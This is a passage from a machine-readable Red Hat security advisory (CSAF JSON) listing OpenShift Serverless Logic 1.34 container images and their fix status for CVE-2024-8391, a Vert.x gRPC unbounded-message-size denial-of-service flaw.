"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64"
},
"product_reference": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64"
},
"product_reference": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64"
},
"product_reference": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64"
},
"product_reference": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64"
},
"product_reference": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64"
},
"product_reference": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64"
},
"product_reference": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64"
},
"product_reference": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64"
},
"product_reference": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64"
},
"product_reference": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64"
},
"product_reference": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64"
},
"product_reference": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64"
},
"product_reference": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
},
"product_reference": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-8391",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2024-09-04T16:20:44.762419+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2309758"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the gRPC server in Eclipse Vert.x, which does not limit the maximum length of the message payload. This may lead to excessive memory consumption in a server or a client, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-8391"
},
{
"category": "external",
"summary": "RHBZ#2309758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-8391",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8391"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-8391",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8391"
},
{
"category": "external",
"summary": "https://github.com/eclipse-vertx/vertx-grpc/issues/113",
"url": "https://github.com/eclipse-vertx/vertx-grpc/issues/113"
},
{
"category": "external",
"summary": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31",
"url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31"
}
],
"release_date": "2024-09-04T16:15:09.253000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
